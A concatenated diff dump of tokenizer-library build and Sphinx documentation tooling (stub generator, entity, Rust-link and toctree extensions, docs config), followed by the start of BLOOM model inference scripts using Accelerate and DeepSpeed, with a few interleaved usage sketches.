+ annotation_map[i] = anno_ix
659
+ return annotation_map
660
+
661
+ @staticmethod
662
+ def __make_char_states(text: str, encoding: Encoding, annotations: AnnotationList) -> List[CharState]:
663
+ annotation_map = EncodingVisualizer.__make_anno_map(text, annotations)
664
+ char_states: List[CharState] = [CharState(char_ix) for char_ix in range(len(text))]
665
+ for (token_ix, token) in enumerate(encoding.tokens):
666
+ offsets = encoding.token_to_chars(token_ix)
667
+ if offsets is not None:
668
+ (start, end) = offsets
669
+ for i in range(start, end):
670
+ char_states[i].tokens.append(token_ix)
671
+ for (char_ix, anno_ix) in enumerate(annotation_map):
672
+ char_states[char_ix].anno_ix = anno_ix
673
+ return char_states
674
+
675
+ def HTMLBody(children: List[str], css_styles=css) -> str:
676
+ children_text = ''.join(children)
677
+ return f'\n <html>\n <head>\n <style>\n {css_styles}\n </style>\n </head>\n <body>\n <div class="tokenized-text" dir=auto>\n {children_text}\n </div>\n </body>\n </html>\n '
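A small usage sketch of EncodingVisualizer outside a notebook. The toy vocabulary and annotation are invented, and the import path assumes the published package layout in which tokenizers.tools re-exports the classes above.

from tokenizers import Tokenizer
from tokenizers.models import WordPiece
from tokenizers.pre_tokenizers import Whitespace
from tokenizers.tools import Annotation, EncodingVisualizer

vocab = {"[UNK]": 0, "hello": 1, "world": 2}
tok = Tokenizer(WordPiece(vocab, unk_token="[UNK]"))
tok.pre_tokenizer = Whitespace()

# default_to_notebook=False makes __call__ return the raw HTML string
viz = EncodingVisualizer(tok, default_to_notebook=False)
annotations = [Annotation(start=0, end=5, label="greeting")]
html = viz("hello world", annotations=annotations)
print(html[:80])  # an <html> document wrapping the tokenized-text div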
678
+
679
+ # File: tokenizers-main/bindings/python/stub.py
680
+ import argparse
681
+ import inspect
682
+ import os
683
+ from pathlib import Path
684
+ INDENT = ' ' * 4
685
+ GENERATED_COMMENT = '# Generated content DO NOT EDIT\n'
686
+
687
+ def do_indent(text: str, indent: str):
688
+ return text.replace('\n', f'\n{indent}')
689
+
690
+ def function(obj, indent, text_signature=None):
691
+ if text_signature is None:
692
+ text_signature = obj.__text_signature__
693
+ string = ''
694
+ string += f'{indent}def {obj.__name__}{text_signature}:\n'
695
+ indent += INDENT
696
+ string += f'{indent}"""\n'
697
+ string += f'{indent}{do_indent(obj.__doc__, indent)}\n'
698
+ string += f'{indent}"""\n'
699
+ string += f'{indent}pass\n'
700
+ string += '\n'
701
+ string += '\n'
702
+ return string
703
+
704
+ def member_sort(member):
705
+ if inspect.isclass(member):
706
+ value = 10 + len(inspect.getmro(member))
707
+ else:
708
+ value = 1
709
+ return value
710
+
711
+ def fn_predicate(obj):
712
+ value = inspect.ismethoddescriptor(obj) or inspect.isbuiltin(obj)
713
+ if value:
714
+ return obj.__doc__ and obj.__text_signature__ and (not obj.__name__.startswith('_'))
715
+ if inspect.isgetsetdescriptor(obj):
716
+ return obj.__doc__ and (not obj.__name__.startswith('_'))
717
+ return False
718
+
719
+ def get_module_members(module):
720
+ members = [member for (name, member) in inspect.getmembers(module) if not name.startswith('_') and (not inspect.ismodule(member))]
721
+ members.sort(key=member_sort)
722
+ return members
723
+
724
+ def pyi_file(obj, indent=''):
725
+ string = ''
726
+ if inspect.ismodule(obj):
727
+ string += GENERATED_COMMENT
728
+ members = get_module_members(obj)
729
+ for member in members:
730
+ string += pyi_file(member, indent)
731
+ elif inspect.isclass(obj):
732
+ indent += INDENT
733
+ mro = inspect.getmro(obj)
734
+ if len(mro) > 2:
735
+ inherit = f'({mro[1].__name__})'
736
+ else:
737
+ inherit = ''
738
+ string += f'class {obj.__name__}{inherit}:\n'
739
+ body = ''
740
+ if obj.__doc__:
741
+ body += f'{indent}"""\n{indent}{do_indent(obj.__doc__, indent)}\n{indent}"""\n'
742
+ fns = inspect.getmembers(obj, fn_predicate)
743
+ if obj.__text_signature__:
744
+ body += f'{indent}def __init__{obj.__text_signature__}:\n'
745
+ body += f'{indent + INDENT}pass\n'
746
+ body += '\n'
747
+ for (name, fn) in fns:
748
+ body += pyi_file(fn, indent=indent)
749
+ if not body:
750
+ body += f'{indent}pass\n'
751
+ string += body
752
+ string += '\n\n'
753
+ elif inspect.isbuiltin(obj):
754
+ string += f'{indent}@staticmethod\n'
755
+ string += function(obj, indent)
756
+ elif inspect.ismethoddescriptor(obj):
757
+ string += function(obj, indent)
758
+ elif inspect.isgetsetdescriptor(obj):
759
+ string += f'{indent}@property\n'
760
+ string += function(obj, indent, text_signature='(self)')
761
+ else:
762
+ raise Exception(f'Object {obj} is not supported')
763
+ return string
764
+
765
+ def py_file(module, origin):
766
+ members = get_module_members(module)
767
+ string = GENERATED_COMMENT
768
+ string += f'from .. import {origin}\n'
769
+ string += '\n'
770
+ for member in members:
771
+ name = member.__name__
772
+ string += f'{name} = {origin}.{name}\n'
773
+ return string
774
+ import subprocess
775
+ from typing import List, Optional, Tuple
776
+
777
+ def do_ruff(code, is_pyi: bool):
778
+ command = ['ruff', 'format', '--config', 'pyproject.toml', '--silent', '-']
779
+ if is_pyi:
780
+ command.extend(['--stdin-filename', 'test.pyi'])
781
+ process = subprocess.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
782
+ (stdout, _) = process.communicate(input=code.encode('utf-8'))
783
+ return stdout.decode('utf-8')
784
+
785
+ def write(module, directory, origin, check=False):
786
+ submodules = [(name, member) for (name, member) in inspect.getmembers(module) if inspect.ismodule(member)]
787
+ filename = os.path.join(directory, '__init__.pyi')
788
+ pyi_content = pyi_file(module)
789
+ pyi_content = do_ruff(pyi_content, is_pyi=True)
790
+ os.makedirs(directory, exist_ok=True)
791
+ if check:
792
+ with open(filename, 'r') as f:
793
+ data = f.read()
794
+ assert data == pyi_content, f'The content of {filename} seems outdated, please run `python stub.py`'
795
+ else:
796
+ with open(filename, 'w') as f:
797
+ f.write(pyi_content)
798
+ filename = os.path.join(directory, '__init__.py')
799
+ py_content = py_file(module, origin)
800
+ py_content = do_ruff(py_content, is_pyi=False)
801
+ os.makedirs(directory, exist_ok=True)
802
+ is_auto = False
803
+ if not os.path.exists(filename):
804
+ is_auto = True
805
+ else:
806
+ with open(filename, 'r') as f:
807
+ line = f.readline()
808
+ if line == GENERATED_COMMENT:
809
+ is_auto = True
810
+ if is_auto:
811
+ if check:
812
+ with open(filename, 'r') as f:
813
+ data = f.read()
814
+ assert data == py_content, f'The content of {filename} seems outdated, please run `python stub.py`'
815
+ else:
816
+ with open(filename, 'w') as f:
817
+ f.write(py_content)
818
+ for (name, submodule) in submodules:
819
+ write(submodule, os.path.join(directory, name), f'{name}', check=check)
820
+ if __name__ == '__main__':
821
+ parser = argparse.ArgumentParser()
822
+ parser.add_argument('--check', action='store_true')
823
+ args = parser.parse_args()
824
+ import tokenizers
825
+ write(tokenizers.tokenizers, 'py_src/tokenizers/', 'tokenizers', check=args.check)
826
+
827
+ # File: tokenizers-main/docs/source/_ext/entities.py
828
+ from collections import defaultdict, abc
829
+ from typing import cast
830
+ from docutils import nodes
831
+ from docutils.parsers.rst import Directive
832
+ import sphinx
833
+ from sphinx.locale import _
834
+ from sphinx.util.docutils import SphinxDirective
835
+ from sphinx.errors import ExtensionError, NoUri
836
+ from conf import languages as LANGUAGES
837
+ logger = sphinx.util.logging.getLogger(__name__)
838
+ GLOBALNAME = '$GLOBAL$'
839
+
840
+ def update(d, u):
841
+ for (k, v) in u.items():
842
+ if isinstance(v, abc.Mapping):
843
+ d[k] = update(d.get(k, {}), v)
844
+ else:
845
+ d[k] = v
846
+ return d
847
+
848
+ class EntityNode(nodes.General, nodes.Element):
849
+ pass
850
+
851
+ class EntitiesNode(nodes.General, nodes.Element):
852
+ pass
853
+
854
+ class AllEntities:
855
+
856
+ def __init__(self):
857
+ self.entities = defaultdict(dict)
858
+
859
+ @classmethod
860
+ def install(cls, env):
861
+ if not hasattr(env, 'entity_all_entities'):
862
+ entities = cls()
863
+ env.entity_all_entities = entities
864
+ return env.entity_all_entities
865
+
866
+ def merge(self, other):
867
+ self.entities.update(other.entities)
868
+
869
+ def purge(self, docname):
870
+ for env_docname in [GLOBALNAME, docname]:
871
+ self.entities[env_docname] = dict([(name, entity) for (name, entity) in self.entities[env_docname].items() if entity['docname'] != docname])
872
+
873
+ def _extract_entities(self, nodes):
874
+ pass
875
+
876
+ def _extract_options(self, nodes):
877
+ pass
878
+
879
+ def _add_entities(self, entities, language, is_global, docname):
880
+ scope = GLOBALNAME if is_global else docname
881
+ for entity in entities:
882
+ name = f"{language}-{entity['name']}"
883
+ content = entity['content']
884
+ if name in self.entities[scope]:
885
+ logger.warning(f'''Entity "{name}" has already been defined{(' globally' if is_global else '')}''', location=docname)
886
+ self.entities[scope][name] = {'docname': docname, 'content': content}
887
+
888
+ def _extract_global(self, nodes):
889
+ for node in nodes:
890
+ if node.tagname != 'field':
891
+ raise Exception(f'Expected a field, found {node.tagname}')
892
+ (name, _) = node.children
893
+ if name.tagname != 'field_name':
894
+ raise Exception(f'Expected a field name here, found {name.tagname}')
895
+ if str(name.children[0]) == 'global':
896
+ return True
897
+
898
+ def _extract_entities(self, nodes):
899
+ entities = []
900
+ for node in nodes:
901
+ if node.tagname != 'definition_list_item':
902
+ raise Exception(f'Expected a list item here, found {node.tagname}')
903
+ (name_node, content_node) = node.children
904
+ if name_node.tagname != 'term':
905
+ raise Exception(f'Expected a term here, found {name_node.tagname}')
906
+ if content_node.tagname != 'definition':
907
+ raise Exception(f'Expected a definition here, found {content_node.tagname}')
908
+ name = str(name_node.children[0])
909
+ if len(content_node.children) == 1 and content_node.children[0].tagname == 'paragraph':
910
+ content = content_node.children[0].children[0]
911
+ else:
912
+ content = content_node
913
+ entities.append({'name': name, 'content': content})
914
+ return entities
915
+
916
+ def extract(self, node, docname):
917
+ is_global = False
918
+ entities = []
919
+ language = None
920
+ for node in node.children:
921
+ if language is None and node.tagname != 'paragraph':
922
+ raise Exception(f'Expected language name:\n.. entities:: <LANGUAGE>')
923
+ elif language is None and node.tagname == 'paragraph':
924
+ language = str(node.children[0])
925
+ if language not in LANGUAGES:
926
+ raise Exception(f'Unknown language "{language}. Might be missing a newline after language"')
927
+ elif node.tagname == 'field_list':
928
+ is_global = self._extract_global(node.children)
929
+ elif node.tagname == 'definition_list':
930
+ entities.extend(self._extract_entities(node.children))
931
+ else:
932
+ raise Exception(f'Expected a list of terms/options, found {node.tagname}')
933
+ self._add_entities(entities, language, is_global, docname)
934
+
935
+ def resolve_pendings(self, app):
936
+ env = app.builder.env
937
+ updates = defaultdict(dict)
938
+ for env_docname in self.entities.keys():
939
+ for (name, entity) in self.entities[env_docname].items():
940
+ docname = entity['docname']
941
+ node = entity['content']
942
+ for node in node.traverse(sphinx.addnodes.pending_xref):
943
+ contnode = cast(nodes.TextElement, node[0].deepcopy())
944
+ newnode = None
945
+ typ = node['reftype']
946
+ target = node['reftarget']
947
+ refdoc = node.get('refdoc', docname)
948
+ domain = None
949
+ try:
950
+ if 'refdomain' in node and node['refdomain']:
951
+ try:
952
+ domain = env.domains[node['refdomain']]
953
+ except KeyError as exc:
954
+ raise NoUri(target, typ) from exc
955
+ newnode = domain.resolve_xref(env, refdoc, app.builder, typ, target, node, contnode)
956
+ except NoUri:
957
+ newnode = contnode
958
+ updates[env_docname][name] = {'docname': docname, 'content': newnode or contnode}
959
+ update(self.entities, updates)
960
+
961
+ def get(self, language, name, docname):
962
+ name = f'{language}-{name}'
963
+ if name in self.entities[docname]:
964
+ return self.entities[docname][name]
965
+ elif name in self.entities[GLOBALNAME]:
966
+ return self.entities[GLOBALNAME][name]
967
+ else:
968
+ return None
969
+
970
+ class EntitiesDirective(SphinxDirective):
971
+ has_content = True
972
+
973
+ def run(self):
974
+ content = nodes.definition_list()
975
+ self.state.nested_parse(self.content, self.content_offset, content)
976
+ try:
977
+ entities = AllEntities.install(self.env)
978
+ entities.extract(content, self.env.docname)
979
+ except Exception as err:
980
+ raise self.error(f'Malformed directive "entities": {err}')
981
+ return []
982
+
983
+ def entity_role(name, rawtext, text, lineno, inliner, options={}, content=[]):
984
+ node = EntityNode()
985
+ node.entity = text
986
+ return ([node], [])
987
+
988
+ def process_entity_nodes(app, doctree, docname):
989
+ env = app.builder.env
990
+ entities = AllEntities.install(env)
991
+ entities.resolve_pendings(app)
992
+ language = None
993
+ try:
994
+ language = next((l for l in LANGUAGES if l in app.tags))
995
+ except Exception:
996
+ logger.warning(f'No language tag specified, not resolving entities in {docname}')
997
+ for node in doctree.traverse(EntityNode):
998
+ if language is None:
999
+ node.replace_self(nodes.Text(_(node.entity), _(node.entity)))
1000
+ else:
1001
+ entity = entities.get(language, node.entity, docname)
1002
+ if entity is None:
1003
+ node.replace_self(nodes.Text(_(node.entity), _(node.entity)))
1004
+ logger.warning(f'Entity "{node.entity}" has not been defined', location=node)
1005
+ else:
1006
+ node.replace_self(entity['content'])
1007
+
1008
+ def purge_entities(app, env, docname):
1009
+ entities = AllEntities.install(env)
1010
+ entities.purge(docname)
1011
+
1012
+ def merge_entities(app, env, docnames, other):
1013
+ entities = AllEntities.install(env)
1014
+ other_entities = AllEntities.install(other)
1015
+ entities.merge(other_entities)
1016
+
1017
+ def setup(app):
1018
+ app.add_node(EntityNode)
1019
+ app.add_node(EntitiesNode)
1020
+ app.add_directive('entities', EntitiesDirective)
1021
+ app.add_role('entity', entity_role)
1022
+ app.connect('doctree-resolved', process_entity_nodes)
1023
+ app.connect('env-merge-info', merge_entities)
1024
+ app.connect('env-purge-doc', purge_entities)
1025
+ return {'version': '0.1', 'parallel_read_safe': True, 'parallel_write_safe': True}
1026
+
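+ # A minimal sketch of the input the "entities" directive above expects, as
+ # inferred from extract(): a paragraph naming the language first, then a
+ # definition list of term/definition pairs (plus an optional field list that
+ # _extract_global() inspects). The reST below is illustrative only, not taken
+ # from the actual tokenizers docs.
+ EXAMPLE_ENTITIES_BLOCK = '''
+ .. entities:: python
+
+     Tokenizer
+         :class:`~tokenizers.Tokenizer`
+ '''
+ # Pages can then write :entity:`Tokenizer`, and process_entity_nodes() swaps
+ # in the definition registered for the language selected via Sphinx tags.
+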
1027
+ # File: tokenizers-main/docs/source/_ext/rust_doc.py
1028
+ from docutils import nodes
1029
+ import sphinx
1030
+ from sphinx.locale import _
1031
+ from conf import rust_version
1032
+ logger = sphinx.util.logging.getLogger(__name__)
1033
+
1034
+ class RustRef:
1035
+
1036
+ def __call__(self, name, rawtext, text, lineno, inliner, options={}, content=[]):
1037
+ doctype = name.split('_')[1]
1038
+ parts = text.split('::')
1039
+ if text.startswith('~'):
1040
+ title = parts[-1]
1041
+ parts[0] = parts[0][1:]
1042
+ else:
1043
+ title = text
1044
+ link = self.base_link()
1045
+ if doctype == 'struct':
1046
+ (l, title) = self.make_struct_link(parts, title)
1047
+ if doctype == 'func':
1048
+ (l, title) = self.make_func_link(parts, title)
1049
+ if doctype == 'meth':
1050
+ (l, title) = self.make_meth_link(parts, title)
1051
+ if doctype == 'trait':
1052
+ (l, title) = self.make_trait_link(parts, title)
1053
+ link += l
1054
+ node = nodes.reference(internal=False, refuri=link, text=title)
1055
+ wrapper = nodes.literal(classes=['xref'])
1056
+ wrapper += node
1057
+ return ([wrapper], [])
1058
+
1059
+ def base_link(self):
1060
+ return f'https://docs.rs/tokenizers/{rust_version}'
1061
+
1062
+ def make_struct_link(self, parts, title):
1063
+ link = ''
1064
+ struct_name = parts[-1]
1065
+ path = parts[:-1]
1066
+ for p in path:
1067
+ link += f'/{p}'
1068
+ link += f'/struct.{struct_name}.html'
1069
+ return (link, title)
1070
+
1071
+ def make_func_link(self, parts, title):
1072
+ link = ''
1073
+ fn_name = parts[-1]
1074
+ path = parts[:-1]
1075
+ for p in path:
1076
+ link += f'/{p}'
1077
+ link += f'/fn.{fn_name}.html'
1078
+ return (link, title)
1079
+
1080
+ def make_meth_link(self, parts, title):
1081
+ meth_name = parts[-1]
1082
+ if meth_name.endswith('()'):
1083
+ meth_name = meth_name[:-2]
1084
+ (link, title) = self.make_struct_link(parts[:-1], title)
1085
+ link += f'#method.{meth_name}'
1086
+ if not title.endswith(')'):
1087
+ title += '()'
1088
+ return (link, title)
1089
+
1090
+ def make_trait_link(self, parts, title):
1091
+ link = ''
1092
+ trait_name = parts[-1]
1093
+ path = parts[:-1]
1094
+ for p in path:
1095
+ link += f'/{p}'
1096
+ link += f'/trait.{trait_name}.html'
1097
+ return (link, title)
1098
+
1099
+ def setup(app):
1100
+ app.add_role('rust_struct', RustRef())
1101
+ app.add_role('rust_func', RustRef())
1102
+ app.add_role('rust_meth', RustRef())
1103
+ app.add_role('rust_trait', RustRef())
1104
+ return {'version': '0.1', 'parallel_read_safe': True, 'parallel_write_safe': True}
1105
+
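+ # Quick, standalone restatement of the URLs the RustRef role above produces,
+ # so the link shape can be checked without Sphinx. "tokenizers::Tokenizer"
+ # is just an example target.
+ def example_struct_url(text, version='latest'):
+     parts = text.split('::')
+     path = ''.join(f'/{p}' for p in parts[:-1])
+     return f'https://docs.rs/tokenizers/{version}{path}/struct.{parts[-1]}.html'
+
+ print(example_struct_url('tokenizers::Tokenizer'))
+ # -> https://docs.rs/tokenizers/latest/tokenizers/struct.Tokenizer.html
+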
1106
+ # File: tokenizers-main/docs/source/_ext/toctree_tags.py
1107
+ import re
1108
+ from sphinx.directives.other import TocTree
1109
+
1110
+ class TocTreeTags(TocTree):
1111
+ hasPat = re.compile('^\\s*:(.+):(.+)$')
1112
+
1113
+ def filter_entries(self, entries):
1114
+ filtered = []
1115
+ for e in entries:
1116
+ m = self.hasPat.match(e)
1117
+ if m is not None:
1118
+ if self.env.app.tags.has(m.groups()[0]):
1119
+ filtered.append(m.groups()[1])
1120
+ else:
1121
+ filtered.append(e)
1122
+ return filtered
1123
+
1124
+ def run(self):
1125
+ self.content = self.filter_entries(self.content)
1126
+ return super().run()
1127
+
1128
+ def setup(app):
1129
+ app.add_directive('toctree-tags', TocTreeTags)
1130
+ return {'version': '0.1'}
1131
+
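+ # Standalone sketch of the filtering done by TocTreeTags above: entries
+ # prefixed with ":<tag>:" are kept (minus the prefix) only when that tag is
+ # active; the entry names below are invented for illustration.
+ import re
+
+ has_pat = re.compile('^\\s*:(.+):(.+)$')
+
+ def filter_entries(entries, active_tags):
+     filtered = []
+     for e in entries:
+         m = has_pat.match(e)
+         if m is None:
+             filtered.append(e)
+         elif m.group(1) in active_tags:
+             filtered.append(m.group(2))
+     return filtered
+
+ print(filter_entries(['installation', ':python:quicktour', ':rust:quicktour'], {'python'}))
+ # -> ['installation', 'quicktour']
+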
1132
+ # File: tokenizers-main/docs/source/conf.py
1133
+ import os
1134
+ import sys
1135
+ sys.path.insert(0, os.path.abspath('./_ext'))
1136
+ sys.path.insert(0, os.path.abspath('.'))
1137
+ project = 'tokenizers'
1138
+ copyright = '2020, huggingface'
1139
+ author = 'huggingface'
1140
+ release = ''
1141
+ languages = ['node', 'rust', 'python']
1142
+ rust_version = 'latest'
1143
+ extensions = ['sphinx.ext.autodoc', 'sphinx.ext.napoleon', 'entities', 'rust_doc', 'toctree_tags']
1144
+ templates_path = ['_templates']
1145
+ exclude_patterns = []
1146
+ html_theme = 'sphinx_rtd_theme'
1147
+ html_theme_options = {'analytics_id': 'UA-83738774-2'}
1148
+ html_static_path = ['_static']
1149
+
1150
+ def setup(app):
1151
+ for language in languages:
1152
+ if not tags.has(language):
1153
+ exclude_patterns.append(f'tutorials/{language}/*')
1154
+ app.add_css_file('css/huggingface.css')
1155
+ app.add_css_file('css/code-snippets.css')
1156
+ app.add_js_file('js/custom.js')
1157
+
huggingface_transformers-bloom-inference.txt ADDED
@@ -0,0 +1,1235 @@
1
+ # File: transformers-bloom-inference-main/bloom-inference-scripts/bloom-accelerate-inference.py
2
+ import argparse
3
+ import gc
4
+ import math
5
+ import os
6
+ import time
7
+ import torch
8
+ import torch.distributed as dist
9
+ from transformers import AutoConfig, AutoModelForCausalLM, AutoTokenizer
10
+
11
+ def get_args():
12
+ parser = argparse.ArgumentParser()
13
+ parser.add_argument('--local_rank', required=False, type=int, help='used by dist launchers')
14
+ parser.add_argument('--name', type=str, help='Name path', required=True)
15
+ parser.add_argument('--batch_size', default=1, type=int, help='batch size')
16
+ parser.add_argument('--benchmark', action='store_true', help='additionally run benchmark')
17
+ parser.add_argument('--greedy', action='store_true')
18
+ parser.add_argument('--top-k', type=int, default=0)
19
+ parser.add_argument('--top-p', type=float, default=0.0)
20
+ parser.add_argument('--dtype', type=str, help='float16 or int8', choices=['int8', 'float16'], default='float16')
21
+ return parser.parse_args()
22
+ t_start = time.time()
23
+ num_tokens = 100
24
+ args = get_args()
25
+ local_rank = int(os.getenv('LOCAL_RANK', '0'))
26
+ world_size = torch.cuda.device_count()
27
+ rank = local_rank
28
+
29
+ def print_rank0(*msg):
30
+ if rank != 0:
31
+ return
32
+ print(*msg)
33
+ print_rank0(f'Using {world_size} gpus')
34
+ model_name = args.name
35
+ print_rank0(f'Loading model {model_name}')
36
+ tokenizer = AutoTokenizer.from_pretrained(model_name)
37
+ dtype = torch.bfloat16 if model_name in ['bigscience/bloom', 'bigscience/bigscience-small-testing'] else torch.float16
38
+ infer_dtype = args.dtype
39
+ if infer_dtype == 'int8':
40
+ dtype = torch.int8
41
+ kwargs = dict(device_map='auto')
42
+
43
+ def get_world_size() -> int:
44
+ if dist.is_initialized():
45
+ return dist.get_world_size()
46
+ else:
47
+ return 1
48
+ if get_world_size() > 1:
49
+ kwargs['device_map'] = 'balanced_low_0'
50
+ if infer_dtype == 'int8':
51
+ print_rank0('Using `load_in_8bit=True` to use quantized model')
52
+ kwargs['load_in_8bit'] = True
53
+ else:
54
+ kwargs['torch_dtype'] = dtype
55
+ model = AutoModelForCausalLM.from_pretrained(model_name, **kwargs)
56
+ if args.benchmark:
57
+ t_ready = time.time()
58
+ print_rank0(f'*** Starting to generate {num_tokens} tokens with bs={args.batch_size}')
59
+ input_sentences = ['DeepSpeed is a machine learning framework', 'He is working on', 'He has a', 'He got all', 'Everyone is happy and I can', 'The new movie that got Oscar this year', 'In the far far distance from our galaxy,', 'Peace is the only way']
60
+ if args.batch_size > len(input_sentences):
61
+ input_sentences *= math.ceil(args.batch_size / len(input_sentences))
62
+ generate_kwargs = dict(max_new_tokens=num_tokens, do_sample=False)
63
+ print_rank0(f'Generate args {generate_kwargs}')
64
+ inputs = input_sentences[:args.batch_size]
65
+
66
+ def generate():
67
+ input_tokens = tokenizer.batch_encode_plus(inputs, return_tensors='pt', padding=True)
68
+ for t in input_tokens:
69
+ if torch.is_tensor(input_tokens[t]):
70
+ input_tokens[t] = input_tokens[t].to('cuda:0')
71
+ outputs = model.generate(**input_tokens, **generate_kwargs)
72
+ input_tokens_lengths = [x.shape[0] for x in input_tokens.input_ids]
73
+ output_tokens_lengths = [x.shape[0] for x in outputs]
74
+ total_new_tokens = [o - i for (i, o) in zip(input_tokens_lengths, output_tokens_lengths)]
75
+ outputs = tokenizer.batch_decode(outputs, skip_special_tokens=True)
76
+ return zip(inputs, outputs, total_new_tokens)
77
+ print_rank0('*** Running generate')
78
+ t_generate_start = time.time()
79
+ generated = generate()
80
+ t_generate_span = time.time() - t_generate_start
81
+ for (i, o, _) in generated:
82
+ print_rank0(f"{'-' * 60}\nin={i}\nout={o}\n")
83
+ if args.benchmark:
84
+ torch.cuda.empty_cache()
85
+ gc.collect()
86
+ print_rank0('*** Running benchmark')
87
+ for i in range(1):
88
+ _ = generate()
89
+ torch.cuda.synchronize()
90
+ t0 = time.time()
91
+ cycles = 5
92
+ total_new_tokens_generated = 0
93
+ for i in range(cycles):
94
+ generated = generate()
95
+ total_new_tokens_generated += sum((new_tokens for (_, _, new_tokens) in generated))
96
+ torch.cuda.synchronize()
97
+ throughput = (time.time() - t0) / total_new_tokens_generated
98
+ print_rank0(f'\n*** Performance stats:\nThroughput per token including tokenize: {throughput * 1000:.2f} msecs\nStart to ready to generate: {t_ready - t_start:.3f} secs\nTokenize and generate {total_new_tokens_generated} (bs={args.batch_size}) tokens: {t_generate_span:.3f} secs\nStart to finish: {t_ready - t_start + t_generate_span:.3f} secs\n')
99
+
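+ # The benchmark block above divides wall-clock time by the number of freshly
+ # generated tokens and prints it in milliseconds; a standalone restatement of
+ # that arithmetic with made-up numbers so the units are explicit.
+ def per_token_latency_ms(elapsed_seconds, total_new_tokens):
+     return elapsed_seconds / total_new_tokens * 1000
+
+ # e.g. 5 cycles x batch of 8 x 100 new tokens each, generated in 120 seconds:
+ print(f'{per_token_latency_ms(120.0, 5 * 8 * 100):.2f} msecs per token')  # 30.00
+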
100
+ # File: transformers-bloom-inference-main/bloom-inference-scripts/bloom-ds-inference.py
101
+ import gc
102
+ import io
103
+ import json
104
+ import math
105
+ import os
106
+ import time
107
+ from argparse import ArgumentParser
108
+ from pathlib import Path
109
+ import torch
110
+ import torch.distributed as dist
111
+ import deepspeed
112
+ from huggingface_hub import snapshot_download
113
+ from transformers import AutoConfig, AutoModelForCausalLM, AutoTokenizer
114
+ from transformers.models.bloom.modeling_bloom import BloomBlock as BloomBlock
115
+ from transformers.utils import is_offline_mode
116
+ tp_presharded_models = ['microsoft/bloom-deepspeed-inference-int8', 'microsoft/bloom-deepspeed-inference-fp16']
117
+ t_start = time.time()
118
+ num_tokens = 100
119
+ parser = ArgumentParser()
120
+ parser.add_argument('--name', required=True, type=str, help='model_name')
121
+ parser.add_argument('--dtype', type=str, help='float16 or int8', choices=['int8', 'float16'], default='float16')
122
+ parser.add_argument('--local_rank', required=False, type=int, help='used by dist launchers')
123
+ parser.add_argument('--batch_size', default=1, type=int, help='batch size')
124
+ parser.add_argument('--benchmark', action='store_true', help='additionally run benchmark')
125
+ args = parser.parse_args()
126
+ local_rank = int(os.getenv('LOCAL_RANK', '0'))
127
+ world_size = int(os.getenv('WORLD_SIZE', '1'))
128
+ deepspeed.init_distributed('nccl')
129
+ rank = dist.get_rank()
130
+
131
+ def print_rank0(*msg):
132
+ if rank != 0:
133
+ return
134
+ print(*msg)
135
+
136
+ def get_repo_root(model_name_or_path):
137
+ if is_offline_mode():
138
+ print_rank0('Offline mode: forcing local_files_only=True')
139
+ if rank == 0:
140
+ snapshot_download(model_name_or_path, local_files_only=is_offline_mode(), cache_dir=os.getenv('TRANSFORMERS_CACHE', None), ignore_patterns=['*.safetensors'])
141
+ dist.barrier()
142
+ return snapshot_download(model_name_or_path, local_files_only=is_offline_mode(), cache_dir=os.getenv('TRANSFORMERS_CACHE', None), ignore_patterns=['*.safetensors'])
143
+
144
+ def get_checkpoint_files(model_name_or_path):
145
+ cached_repo_dir = get_repo_root(model_name_or_path)
146
+ file_list = [str(entry) for entry in Path(cached_repo_dir).rglob('*.[bp][it][n]') if entry.is_file()]
147
+ return file_list
148
+ model_name = args.name
149
+ infer_dtype = args.dtype
150
+ tp_presharded_mode = True if model_name in tp_presharded_models else False
151
+ print_rank0(f'*** Loading the model {model_name}')
152
+ tokenizer = AutoTokenizer.from_pretrained(model_name)
153
+ config = AutoConfig.from_pretrained(model_name)
154
+ kernel_inject = True
155
+ if kernel_inject:
156
+ dtype = torch.float16
157
+ else:
158
+ dtype = torch.bfloat16
159
+ if args.benchmark:
160
+ torch.cuda.empty_cache()
161
+ gc.collect()
162
+ deepspeed.runtime.utils.see_memory_usage('pre-from-pretrained', force=True)
163
+ with deepspeed.OnDevice(dtype=dtype, device='meta'):
164
+ model = AutoModelForCausalLM.from_config(config, torch_dtype=torch.bfloat16)
165
+ if args.benchmark:
166
+ deepspeed.runtime.utils.see_memory_usage('post-from-pretrained', force=True)
167
+ model = model.eval()
168
+ if args.benchmark:
169
+ torch.cuda.empty_cache()
170
+ gc.collect()
171
+ deepspeed.runtime.utils.see_memory_usage('post-init-ds-zero-init', force=True)
172
+ checkpoints_json = 'checkpoints.json'
173
+
174
+ def write_checkpoints_json():
175
+ checkpoint_files = get_checkpoint_files(model_name)
176
+ if rank == 0:
177
+ data = {'type': 'BLOOM', 'checkpoints': checkpoint_files, 'version': 1.0}
178
+ json.dump(data, open(checkpoints_json, 'w'))
179
+ if args.benchmark:
180
+ torch.cuda.empty_cache()
181
+ gc.collect()
182
+ deepspeed.runtime.utils.see_memory_usage('pre-ds-inference-init', force=True)
183
+ if kernel_inject:
184
+ kwargs = dict(replace_with_kernel_inject=True)
185
+ else:
186
+ kwargs = dict(injection_policy={BloomBlock: ('self_attention.dense', 'mlp.dense_4h_to_h')})
187
+ repo_root = get_repo_root(model_name)
188
+ if tp_presharded_mode:
189
+ checkpoints_json = os.path.join(repo_root, 'ds_inference_config.json')
190
+ else:
191
+ write_checkpoints_json()
192
+ dist.barrier()
193
+ model = deepspeed.init_inference(model, mp_size=world_size, base_dir=repo_root, dtype=getattr(torch, infer_dtype), checkpoint=checkpoints_json, **kwargs)
194
+ if args.benchmark:
195
+ torch.cuda.empty_cache()
196
+ gc.collect()
197
+ deepspeed.runtime.utils.see_memory_usage('post-ds-inference-init', force=True)
198
+ model = model.module
199
+ if args.benchmark:
200
+ t_ready = time.time()
201
+ print_rank0(f'*** Starting to generate {num_tokens} tokens with bs={args.batch_size}')
202
+ input_sentences = ['DeepSpeed is a machine learning framework', 'He is working on', 'He has a', 'He got all', 'Everyone is happy and I can', 'The new movie that got Oscar this year', 'In the far far distance from our galaxy,', 'Peace is the only way']
203
+ if args.batch_size > len(input_sentences):
204
+ input_sentences *= math.ceil(args.batch_size / len(input_sentences))
205
+ generate_kwargs = dict(max_new_tokens=num_tokens, do_sample=False)
206
+ print_rank0(f'Generate args {generate_kwargs}')
207
+ inputs = input_sentences[:args.batch_size]
208
+
209
+ def generate():
210
+ input_tokens = tokenizer.batch_encode_plus(inputs, return_tensors='pt', padding=True)
211
+ for t in input_tokens:
212
+ if torch.is_tensor(input_tokens[t]):
213
